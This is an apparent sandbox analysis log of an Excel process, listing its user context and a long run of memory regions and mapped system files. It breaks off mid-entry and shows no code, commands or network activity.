# Flog Txt Version 1 # Analyzer Version: 2.3.2 # Analyzer Build Date: Oct 25 2018 12:55:11 # Log Creation Date: 05.11.2018 09:27:26.469 Process: id = "1" image_name = "excel.exe" filename = "c:\\program files\\microsoft office\\root\\office16\\excel.exe" page_root = "0x2e9b0000" os_pid = "0x8fc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Program Files\\Microsoft Office\\Root\\Office16\\EXCEL.EXE\"" cur_dir = "C:\\Users\\aETAdzjz\\Desktop\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e662" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 134 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 135 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 136 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 137 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 138 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 139 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 140 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 141 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 142 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 143 start_va = 0x1f0000 end_va = 0x1f6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 144 start_va = 0x200000 end_va = 0x201fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 145 start_va = 0x210000 end_va = 0x210fff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 146 start_va = 0x220000 end_va = 0x220fff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 147 start_va = 0x230000 end_va = 0x232fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 148 start_va = 0x240000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 149 start_va = 0x250000 end_va = 0x252fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 150 start_va = 0x260000 end_va = 0x262fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 151 start_va = 0x270000 end_va = 0x272fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 152 start_va = 0x280000 end_va = 0x282fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 153 start_va = 0x290000 end_va = 0x292fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 154 start_va = 0x2a0000 end_va = 0x2a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 155 start_va = 0x2b0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 156 start_va = 0x3b0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 157 start_va = 0x4b0000 end_va = 0x4b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 158 start_va = 0x4c0000 end_va = 0x4c0fff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 159 start_va = 0x4d0000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 160 start_va = 0x510000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 161 start_va = 0x520000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 162 start_va = 0x530000 end_va = 0x530fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 163 start_va = 0x540000 end_va = 0x541fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 164 start_va = 0x550000 end_va = 0x55bfff entry_point = 0x550000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 165 start_va = 0x560000 end_va = 0x567fff entry_point = 0x560000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 166 start_va = 0x570000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 167 start_va = 0x580000 end_va = 0x707fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 168 start_va = 0x710000 end_va = 0x890fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000710000" filename = "" Region: id = 169 start_va = 0x8a0000 end_va = 0x1c9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 170 start_va = 0x1ca0000 end_va = 0x1f6efff entry_point = 0x1ca0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 171 start_va = 0x1f70000 end_va = 0x2362fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f70000" filename = "" Region: id = 172 start_va = 0x2370000 end_va = 0x246ffff entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 173 start_va = 0x2470000 end_va = 0x266ffff entry_point = 0x0 region_type = private name = "private_0x0000000002470000" filename = "" Region: id = 174 start_va = 0x2670000 end_va = 0x267ffff entry_point = 0x2670000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 175 start_va = 0x2680000 end_va = 0x2680fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002680000" filename = "" Region: id = 176 start_va = 0x2690000 end_va = 0x2690fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 177 start_va = 0x26a0000 end_va = 0x26a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026a0000" filename = "" Region: id = 178 start_va = 0x26b0000 end_va = 0x26b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026b0000" filename = "" Region: id = 179 start_va = 0x26c0000 end_va = 0x26c4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026c0000" filename = "" Region: id = 180 start_va = 0x26d0000 end_va = 0x26d0fff entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 181 start_va = 0x26e0000 end_va = 0x275ffff entry_point = 0x0 region_type = private name = "private_0x00000000026e0000" filename = "" Region: id = 182 start_va = 0x2760000 end_va = 0x283efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002760000" filename = "" Region: id = 183 start_va = 0x2840000 end_va = 0x293ffff entry_point = 0x0 region_type = private name = "private_0x0000000002840000" filename = "" Region: id = 184 start_va = 0x2940000 end_va = 0x2941fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002940000" filename = "" Region: id = 185 start_va = 0x2950000 end_va = 0x2950fff entry_point = 0x0 region_type = private name = "private_0x0000000002950000" filename = "" Region: id = 186 start_va = 0x2960000 end_va = 0x2960fff entry_point = 0x0 region_type = private name = "private_0x0000000002960000" filename = "" Region: id = 187 start_va = 0x2970000 end_va = 0x2970fff entry_point = 0x0 region_type = private name = "private_0x0000000002970000" filename = "" Region: id = 188 start_va = 0x2980000 end_va = 0x2980fff entry_point = 0x0 region_type = private name = "private_0x0000000002980000" filename = "" Region: id = 189 start_va = 0x2990000 end_va = 0x2990fff entry_point = 0x0 region_type = private name = "private_0x0000000002990000" filename = "" Region: id = 190 start_va = 0x29a0000 end_va = 0x2a9ffff entry_point = 0x0 region_type = private name = "private_0x00000000029a0000" filename = "" Region: id = 191 start_va = 0x2aa0000 end_va = 0x2aa1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002aa0000" filename = "" Region: id = 192 start_va = 0x2ab0000 end_va = 0x2ab0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002ab0000" filename = "" Region: id = 193 start_va = 0x2ac0000 end_va = 0x2ac0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002ac0000" filename = "" Region: id = 194 start_va = 0x2ad0000 end_va = 0x2bcffff entry_point = 0x0 region_type = private name = "private_0x0000000002ad0000" filename = "" Region: id = 195 start_va = 0x2bd0000 end_va = 0x3c17fff entry_point = 0x2bd0000 region_type = mapped_file name = "xlintl32.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\1033\\XLINTL32.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\xlintl32.dll") Region: id = 196 start_va = 0x3c20000 end_va = 0x3cdffff entry_point = 0x3c20000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 197 start_va = 0x3ce0000 end_va = 0x3ce1fff entry_point = 0x0 region_type = private name = "private_0x0000000003ce0000" filename = "" Region: id = 198 start_va = 0x3cf0000 end_va = 0x3deffff entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 199 start_va = 0x3df0000 end_va = 0x3df0fff entry_point = 0x0 region_type = private name = "private_0x0000000003df0000" filename = "" Region: id = 200 start_va = 0x3e00000 end_va = 0x3e00fff entry_point = 0x0 region_type = private name = "private_0x0000000003e00000" filename = "" Region: id = 201 start_va = 0x3e10000 end_va = 0x3e11fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e10000" filename = "" Region: id = 202 start_va = 0x3e20000 end_va = 0x3f1ffff entry_point = 0x0 region_type = private name = "private_0x0000000003e20000" filename = "" Region: id = 203 start_va = 0x3f20000 end_va = 0x401ffff entry_point = 0x0 region_type = private name = "private_0x0000000003f20000" filename = "" Region: id = 204 start_va = 0x4020000 end_va = 0x4020fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004020000" filename = "" Region: id = 205 start_va = 0x4030000 end_va = 0x4031fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004030000" filename = "" Region: id = 206 start_va = 0x4040000 end_va = 0x413ffff entry_point = 0x0 region_type = private name = "private_0x0000000004040000" filename = "" Region: id = 207 start_va = 0x4140000 end_va = 0x41bffff entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 208 start_va = 0x41c0000 end_va = 0x41dffff entry_point = 0x41c0000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000017.db" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db") Region: id = 209 start_va = 0x41e0000 end_va = 0x41e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041e0000" filename = "" Region: id = 210 start_va = 0x41f0000 end_va = 0x41f1fff entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 211 start_va = 0x4200000 end_va = 0x4201fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004200000" filename = "" Region: id = 212 start_va = 0x4210000 end_va = 0x421ffff entry_point = 0x0 region_type = private name = "private_0x0000000004210000" filename = "" Region: id = 213 start_va = 0x4220000 end_va = 0x431ffff entry_point = 0x0 region_type = private name = "private_0x0000000004220000" filename = "" Region: id = 214 start_va = 0x4320000 end_va = 0x441ffff entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 215 start_va = 0x4420000 end_va = 0x4430fff entry_point = 0x4420000 region_type = mapped_file name = "c_1255.nls" filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls") Region: id = 216 start_va = 0x4440000 end_va = 0x4441fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004440000" filename = "" Region: id = 217 start_va = 0x4450000 end_va = 0x4450fff entry_point = 0x0 region_type = private name = "private_0x0000000004450000" filename = "" Region: id = 218 start_va = 0x4460000 end_va = 0x44dffff entry_point = 0x0 region_type = private name = "private_0x0000000004460000" filename = "" Region: id = 219 start_va = 0x44e0000 end_va = 0x44e0fff entry_point = 0x0 region_type = private name = "private_0x00000000044e0000" filename = "" Region: id = 220 start_va = 0x44f0000 end_va = 0x44f0fff entry_point = 0x0 region_type = private name = "private_0x00000000044f0000" filename = "" Region: id = 221 start_va = 0x4500000 end_va = 0x4500fff entry_point = 0x0 region_type = private name = "private_0x0000000004500000" filename = "" Region: id = 222 start_va = 0x4510000 end_va = 0x460ffff entry_point = 0x0 region_type = private name = "private_0x0000000004510000" filename = "" Region: id = 223 start_va = 0x4610000 end_va = 0x4a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004610000" filename = "" Region: id = 224 start_va = 0x4a10000 end_va = 0x4a21fff entry_point = 0x0 region_type = private name = "private_0x0000000004a10000" filename = "" Region: id = 225 start_va = 0x4a30000 end_va = 0x4a41fff entry_point = 0x0 region_type = private name = "private_0x0000000004a30000" filename = "" Region: id = 226 start_va = 0x4a50000 end_va = 0x4a50fff entry_point = 0x0 region_type = private name = "private_0x0000000004a50000" filename = "" Region: id = 227 start_va = 0x4a60000 end_va = 0x4a61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a60000" filename = "" Region: id = 228 start_va = 0x4a70000 end_va = 0x4a71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a70000" filename = "" Region: id = 229 start_va = 0x4a80000 end_va = 0x4a83fff entry_point = 0x4a80000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 230 start_va = 0x4a90000 end_va = 0x4abffff entry_point = 0x4a90000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000001c.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db") Region: id = 231 start_va = 0x4ac0000 end_va = 0x4ac3fff entry_point = 0x4ac0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 232 start_va = 0x4ad0000 end_va = 0x4b35fff entry_point = 0x4ad0000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 233 start_va = 0x4b40000 end_va = 0x4b41fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b40000" filename = "" Region: id = 234 start_va = 0x4b50000 end_va = 0x4b5cfff entry_point = 0x4b50000 region_type = mapped_file name = "comdlg32.dll.mui" filename = "\\Windows\\System32\\en-US\\comdlg32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\comdlg32.dll.mui") Region: id = 235 start_va = 0x4b60000 end_va = 0x4b61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b60000" filename = "" Region: id = 236 start_va = 0x4b70000 end_va = 0x4b71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b70000" filename = "" Region: id = 237 start_va = 0x4b80000 end_va = 0x4b80fff entry_point = 0x0 region_type = private name = "private_0x0000000004b80000" filename = "" Region: id = 238 start_va = 0x4b90000 end_va = 0x4b90fff entry_point = 0x0 region_type = private name = "private_0x0000000004b90000" filename = "" Region: id = 239 start_va = 0x4ba0000 end_va = 0x4ba0fff entry_point = 0x0 region_type = private name = "private_0x0000000004ba0000" filename = "" Region: id = 240 start_va = 0x4bb0000 end_va = 0x4caffff entry_point = 0x0 region_type = private name = "private_0x0000000004bb0000" filename = "" Region: id = 241 start_va = 0x4cb0000 end_va = 0x4d2efff entry_point = 0x4cb0000 region_type = mapped_file name = "segoeui.ttf" filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf") Region: id = 242 start_va = 0x4d30000 end_va = 0x4d30fff entry_point = 0x0 region_type = private name = "private_0x0000000004d30000" filename = "" Region: id = 243 start_va = 0x4d40000 end_va = 0x4d40fff entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 244 start_va = 0x4d50000 end_va = 0x4d50fff entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 245 start_va = 0x4d60000 end_va = 0x4d62fff entry_point = 0x0 region_type = private name = "private_0x0000000004d60000" filename = "" Region: id = 246 start_va = 0x4d70000 end_va = 0x4d72fff entry_point = 0x0 region_type = private name = "private_0x0000000004d70000" filename = "" Region: id = 247 start_va = 0x4d80000 end_va = 0x4e7ffff entry_point = 0x0 region_type = private name = "private_0x0000000004d80000" filename = "" Region: id = 248 start_va = 0x4e80000 end_va = 0x527ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e80000" filename = "" Region: id = 249 start_va = 0x5280000 end_va = 0x537ffff entry_point = 0x0 region_type = private name = "private_0x0000000005280000" filename = "" Region: id = 250 start_va = 0x5380000 end_va = 0x5382fff entry_point = 0x0 region_type = private name = "private_0x0000000005380000" filename = "" Region: id = 251 start_va = 0x5390000 end_va = 0x5392fff entry_point = 0x0 region_type = private name = "private_0x0000000005390000" filename = "" Region: id = 252 start_va = 0x53a0000 end_va = 0x53a0fff entry_point = 0x0 region_type = private name = "private_0x00000000053a0000" filename = "" Region: id = 253 start_va = 0x53b0000 end_va = 0x54affff entry_point = 0x0 region_type = private name = "private_0x00000000053b0000" filename = "" Region: id = 254 start_va = 0x54b0000 end_va = 0x57f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000054b0000" filename = "" Region: id = 255 start_va = 0x5800000 end_va = 0x58aafff entry_point = 0x5800000 region_type = mapped_file name = "tahoma.ttf" filename = "\\Windows\\Fonts\\tahoma.ttf" (normalized: "c:\\windows\\fonts\\tahoma.ttf") Region: id = 256 start_va = 0x58b0000 end_va = 0x58b0fff entry_point = 0x0 region_type = private name = "private_0x00000000058b0000" filename = "" Region: id = 257 start_va = 0x58c0000 end_va = 0x58c0fff entry_point = 0x0 region_type = private name = "private_0x00000000058c0000" filename = "" Region: id = 258 start_va = 0x58d0000 end_va = 0x594ffff entry_point = 0x0 region_type = private name = "private_0x00000000058d0000" filename = "" Region: id = 259 start_va = 0x5950000 end_va = 0x5950fff entry_point = 0x0 region_type = private name = "private_0x0000000005950000" filename = "" Region: id = 260 start_va = 0x5960000 end_va = 0x5960fff entry_point = 0x0 region_type = private name = "private_0x0000000005960000" filename = "" Region: id = 261 start_va = 0x5970000 end_va = 0x5971fff entry_point = 0x0 region_type = private name = "private_0x0000000005970000" filename = "" Region: id = 262 start_va = 0x5980000 end_va = 0x5980fff entry_point = 0x0 region_type = private name = "private_0x0000000005980000" filename = "" Region: id = 263 start_va = 0x5990000 end_va = 0x59d7fff entry_point = 0x0 region_type = private name = "private_0x0000000005990000" filename = "" Region: id = 264 start_va = 0x59e0000 end_va = 0x5a27fff entry_point = 0x0 region_type = private name = "private_0x00000000059e0000" filename = "" Region: id = 265 start_va = 0x5a30000 end_va = 0x5a3ffff entry_point = 0x0 region_type = private name = "private_0x0000000005a30000" filename = "" Region: id = 266 start_va = 0x5a40000 end_va = 0x5a41fff entry_point = 0x0 region_type = private name = "private_0x0000000005a40000" filename = "" Region: id = 267 start_va = 0x5a50000 end_va = 0x5a50fff entry_point = 0x0 region_type = private name = "private_0x0000000005a50000" filename = "" Region: id = 268 start_va = 0x5a60000 end_va = 0x5b5ffff entry_point = 0x0 region_type = private name = "private_0x0000000005a60000" filename = "" Region: id = 269 start_va = 0x5b60000 end_va = 0x5b61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005b60000" filename = "" Region: id = 270 start_va = 0x5b70000 end_va = 0x5b71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005b70000" filename = "" Region: id = 271 start_va = 0x5b80000 end_va = 0x5b83fff entry_point = 0x5b80000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 272 start_va = 0x5b90000 end_va = 0x5b90fff entry_point = 0x0 region_type = private name = "private_0x0000000005b90000" filename = "" Region: id = 273 start_va = 0x5ba0000 end_va = 0x5ba0fff entry_point = 0x0 region_type = private name = "private_0x0000000005ba0000" filename = "" Region: id = 274 start_va = 0x5bb0000 end_va = 0x5bb0fff entry_point = 0x5bb0000 region_type = mapped_file name = "{40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{40FC8D7D-05ED-4FEB-B03B-6C100659EF5C}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db") Region: id = 275 start_va = 0x5bc0000 end_va = 0x5bc0fff entry_point = 0x0 region_type = private name = "private_0x0000000005bc0000" filename = "" Region: id = 276 start_va = 0x5bd0000 end_va = 0x5bd0fff entry_point = 0x0 region_type = private name = "private_0x0000000005bd0000" filename = "" Region: id = 277 start_va = 0x5be0000 end_va = 0x5be0fff entry_point = 0x0 region_type = private name = "private_0x0000000005be0000" filename = "" Region: id = 278 start_va = 0x5bf0000 end_va = 0x5ceffff entry_point = 0x0 region_type = private name = "private_0x0000000005bf0000" filename = "" Region: id = 279 start_va = 0x5cf0000 end_va = 0x5cf0fff entry_point = 0x0 region_type = private name = "private_0x0000000005cf0000" filename = "" Region: id = 280 start_va = 0x5d00000 end_va = 0x5d00fff entry_point = 0x0 region_type = private name = "private_0x0000000005d00000" filename = "" Region: id = 281 start_va = 0x5d10000 end_va = 0x5d10fff entry_point = 0x0 region_type = private name = "private_0x0000000005d10000" filename = "" Region: id = 282 start_va = 0x5d20000 end_va = 0x5d20fff entry_point = 0x0 region_type = private name = "private_0x0000000005d20000" filename = "" Region: id = 283 start_va = 0x5d30000 end_va = 0x5e2ffff entry_point = 0x0 region_type = private name = "private_0x0000000005d30000" filename = "" Region: id = 284 start_va = 0x5e30000 end_va = 0x5e30fff entry_point = 0x0 region_type = private name = "private_0x0000000005e30000" filename = "" Region: id = 285 start_va = 0x5e40000 end_va = 0x5e40fff entry_point = 0x0 region_type = private name = "private_0x0000000005e40000" filename = "" Region: id = 286 start_va = 0x5e50000 end_va = 0x5e5ffff entry_point = 0x0 region_type = private name = "private_0x0000000005e50000" filename = "" Region: id = 287 start_va = 0x5e60000 end_va = 0x5e60fff entry_point = 0x0 region_type = private name = "private_0x0000000005e60000" filename = "" Region: id = 288 start_va = 0x5e70000 end_va = 0x5e70fff entry_point = 0x0 region_type = private name = "private_0x0000000005e70000" filename = "" Region: id = 289 start_va = 0x5e80000 end_va = 0x5e80fff entry_point = 0x0 region_type = private name = "private_0x0000000005e80000" filename = "" Region: id = 290 start_va = 0x5e90000 end_va = 0x5e90fff entry_point = 0x0 region_type = private name = "private_0x0000000005e90000" filename = "" Region: id = 291 start_va = 0x5ea0000 end_va = 0x5ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000005ea0000" filename = "" Region: id = 292 start_va = 0x5eb0000 end_va = 0x5eb0fff entry_point = 0x0 region_type = private name = "private_0x0000000005eb0000" filename = "" Region: id = 293 start_va = 0x5ec0000 end_va = 0x5fbffff entry_point = 0x0 region_type = private name = "private_0x0000000005ec0000" filename = "" Region: id = 294 start_va = 0x5fc0000 end_va = 0x5fcffff entry_point = 0x0 region_type = private name = "private_0x0000000005fc0000" filename = "" Region: id = 295 start_va = 0x5fd0000 end_va = 0x6033fff entry_point = 0x5fd0000 region_type = mapped_file name = "seguisb.ttf" filename = "\\Windows\\Fonts\\seguisb.ttf" (normalized: "c:\\windows\\fonts\\seguisb.ttf") Region: id = 296 start_va = 0x6040000 end_va = 0x6040fff entry_point = 0x0 region_type = private name = "private_0x0000000006040000" filename = "" Region: id = 297 start_va = 0x6050000 end_va = 0x614ffff entry_point = 0x0 region_type = private name = "private_0x0000000006050000" filename = "" Region: id = 298 start_va = 0x6150000 end_va = 0x6153fff entry_point = 0x6150000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 299 start_va = 0x6160000 end_va = 0x6160fff entry_point = 0x6160000 region_type = mapped_file name = "{0448dc77-1f74-49f5-ba7e-8de74fa55642}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{0448DC77-1F74-49F5-BA7E-8DE74FA55642}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{0448dc77-1f74-49f5-ba7e-8de74fa55642}.2.ver0x0000000000000001.db") Region: id = 300 start_va = 0x6170000 end_va = 0x6173fff entry_point = 0x6170000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 301 start_va = 0x6180000 end_va = 0x6180fff entry_point = 0x6180000 region_type = mapped_file name = "{9d8c497c-611a-4408-acad-eadee99a69bf}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{9D8C497C-611A-4408-ACAD-EADEE99A69BF}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{9d8c497c-611a-4408-acad-eadee99a69bf}.2.ver0x0000000000000001.db") Region: id = 302 start_va = 0x6190000 end_va = 0x6190fff entry_point = 0x0 region_type = private name = "private_0x0000000006190000" filename = "" Region: id = 303 start_va = 0x61a0000 end_va = 0x621ffff entry_point = 0x0 region_type = private name = "private_0x00000000061a0000" filename = "" Region: id = 304 start_va = 0x6220000 end_va = 0x6a1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006220000" filename = "" Region: id = 305 start_va = 0x6a20000 end_va = 0x6a27fff entry_point = 0x0 region_type = private name = "private_0x0000000006a20000" filename = "" Region: id = 306 start_va = 0x6a30000 end_va = 0x6a30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006a30000" filename = "" Region: id = 307 start_va = 0x6a40000 end_va = 0x6a40fff entry_point = 0x6a40000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 308 start_va = 0x6a50000 end_va = 0x6a51fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006a50000" filename = "" Region: id = 309 start_va = 0x6a60000 end_va = 0x6a60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006a60000" filename = "" Region: id 